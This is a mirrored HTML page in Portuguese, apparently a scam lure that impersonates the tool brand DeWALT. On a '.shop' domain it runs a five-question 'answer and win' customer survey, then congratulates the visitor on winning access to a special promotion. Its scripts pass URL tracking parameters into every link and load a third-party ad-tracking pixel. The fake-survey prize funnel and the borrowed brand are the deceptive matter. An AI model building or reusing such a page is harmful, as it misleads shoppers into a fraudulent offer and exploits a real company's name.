﻿<!DOCTYPE html><html lang="pt-br">
<!-- Mirrored from semanaselecionada.shop/quiz/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 16 Jun 2025 14:40:43 GMT -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <link rel="stylesheet" href="css/styles.css">
    <link rel="stylesheet" href="css/fonts.css">

    <link rel="icon" href="images/logo5.png" type="image/x-icon">
    <link rel="apple-touch-icon" sizes="180x180" href="images/favico.html">

    <link rel="stylesheet" href="https://semanaselecionada.shop/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200">
    <title>Oferta Relâmpago</title>
    <script src="js/latest.js" data-utmify-prevent-subids="" data-utmify-fast-start="" async="" defer=""></script>
    <script>
        function onLoad() {
            var links = document.getElementsByTagName("a");

            for (var i = 0, n = links.length; i < n; i++) {
            if (links[i].href.includes("#")) {
                continue;
            }

            var href =
                links[i].href.trim() +
                (links[i].href.indexOf("?") > 0 ? "&" : "?") +
                document.location.search.replace("?", "").toString();
            links[i].href = href;
            }
        }

        document.addEventListener("DOMContentLoaded", onLoad);
    </script>
</head>
<script>
  window.pixelId = "683e520cf7a64486e53871ff";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "../../cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
<body>




    <nav class="navbar" style="padding-top: 15px; margin-bottom: 5px; display: flex; align-items: center; justify-content: space-between; background-color: #fcbc34;">
    <div class="menu-icon" style="padding-left: 3%;">
        <img src="images/logo5.png" style="height: 5vh;" alt="Logo Central Vivara">
    </div>

<!--     <div class="logo-central">
        <img src="images/black1.png" alt="Black Friday Campeã" style="height: 5.89vh;">
    </div> -->

    <div class="menu-icon" style="padding-right: 3%;">
        <span class="material-symbols-outlined" style="font-size: 30px; padding-right: 10px; color: white">menu</span>
    </div>
</nav>


    <div class="pergunta"> 

        <!--------------------- Barra de progresso --------------------->

        <div style="padding-bottom: 20px;"></div>

        <div id="respondaeganhe" class="respondaeganhe">
            <p style="font-family: 'GellixSemiBold';">Responda e ganhe!</p>
        </div>

        <div id="barradeprogresso" class="container" style="padding-bottom: 5px;">
            <div class="progress-bar-container">
                <div class="progress-bar">
                    <div class="progress" id="progress" style="width: 16.6667%;"></div>
                </div>
                <div class="progress-text" id="progress-text">17 %</div>
            </div>
        </div>


        <!--------------------- Pergunta 1 --------------------->

        <div id="p1">
    <img src="images/1.jpg" style="width: 90%; display: flex; margin: 0 auto; border-radius: 15px;">
    <p class="pergunta_title">Como você avaliaria a experiência de comprar em nosso site DeWALT ?</p>
    <ul class="quiz-options">
        <li><button>Muito fácil</button></li>
        <li><button>Fácil</button></li>
        <li><button>Moderadamente fácil</button></li>
        <li><button>Difícil</button></li>
    </ul>
</div>

        <!--------------------- Pergunta 2 --------------------->

        <div id="p2" style="display: none">
    <img src="images/2.jpg" style="width: 90%; display: flex; margin: 0 auto; border-radius: 15px;">
    <p class="pergunta_title">Qual é sua opinião sobre a variedade de produtos disponíveis na DeWALT ?</p>
    <ul class="quiz-options">
        <li><button>Excelentes</button></li>
        <li><button>Boa</button></li>
        <li><button>Aceitavel</button></li>
        <li><button>Insatisfatória</button></li>
    </ul>
</div>


        <!--------------------- Pergunta 3 --------------------->

        <div id="p3" style="display: none">
    <img src="images/3.jpg" style="width: 90%; display: flex; margin: 0 auto; border-radius: 15px;">
    <p class="pergunta_title">Como você classificaria a eficiência da entrega dos produtos comprados na DeWALT ?</p>
    <ul class="quiz-options">
        <li><button>Rápido</button></li>
        <li><button>Aceitável</button></li>
        <li><button>Lenta</button></li>
        <li><button>So compro na Loja</button></li>
    </ul>
</div>


        <!--------------------- Pergunta 4 --------------------->

        <div id="p4" style="display: none">
    <img src="images/4.jpg" style="width: 90%; display: flex; margin: 0 auto; border-radius: 15px;">
    <p class="pergunta_title">Em relação ao atendimento ao cliente da DeWALT, como você descreveria ?</p>
    <ul class="quiz-options">
        <li><button>Excelente</button></li>
        <li><button>Bom</button></li>
        <li><button>Regular</button></li>
        <li><button>Insatisfatório</button></li>
    </ul>
</div>

        <!--------------------- Pergunta 5 --------------------->

        <div id="p5" style="display: none">
    <img src="images/5.jpg" style="width: 90%; display: flex; margin: 0 auto; border-radius: 15px;">
    <p class="pergunta_title">Por onde você conheceu a DeWALT ?</p>
    <ul class="quiz-options">
        <li><button>Pelo instagram</button></li>
        <li><button>Pelo tiktok</button></li>
        <li><button>Pelo Facebook</button></li>
        <li><button>Minha cidade</button></li>
    </ul>
</div>


        <!--------------------- Receber de Graça --------------------->

        <div id="p6" style="display: none">
        <div class="respondaeganhe">
            <p style="font-family: 'GellixSemiBold';">Parabéns!</p>
        </div>

          <img src="images/66.jpg" style="width: 90%; display: flex; margin: 0 auto; border-radius: 15px;">
          

          <p style="padding: 25px;">
            Como forma de agradecimento, você ganhou <strong>um acesso a nossa incrível promoção "da DeWALT" nele você pode escolher produtos da nossa oferta, aproveite!</strong>

            <br><br>
            Esperamos que você aproveite ao máximo cada produto e que eles tragam ainda mais diversão para você e sua família.
            <br><br>

          </p>
      </div>





        <!--------------------- Botão de seguir --------------------->
    
        <div class="question-container">
                <div class="question" id="question1" style="display:none;"></div>
                <div class="question" id="question2" style="display:none;"></div>
                <div class="question" id="question3" style="display:none;"></div>
                <div class="question" id="question4" style="display:none;"></div>
                <div class="question" id="question5" style="display:none;"></div>
                <div class="question" id="question6" style="display:none;"></div>
        </div>

        <div style="padding-bottom: 10px;"></div>
    
        <button class="next-button" id="next-button" onclick="nextQuestion()">Próximo</button>
        
        <div style="padding-bottom: 20px;"></div>

        
    </div>

    


    <script src="js/scripts.js"></script>




    <script>
        document.querySelectorAll('.quiz-options button').forEach(button => {
            button.addEventListener('click', () => {
                document.querySelectorAll('.quiz-options button').forEach(btn => btn.style.borderColor = '#ccc');
                button.style.borderColor = '#fcbc34';
                button.style.backgroundColor = '#fcbc34';
            });
        });
    </script>

<script src="js/latest_1.js" data-utmify-prevent-subids="" async="" defer=""></script>

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">

</body>
<!-- Mirrored from semanaselecionada.shop/quiz/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 16 Jun 2025 14:40:47 GMT -->
</html>